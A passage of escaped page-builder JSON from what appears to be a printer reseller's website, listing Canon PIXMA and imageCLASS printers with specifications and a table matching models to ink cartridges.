\\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td 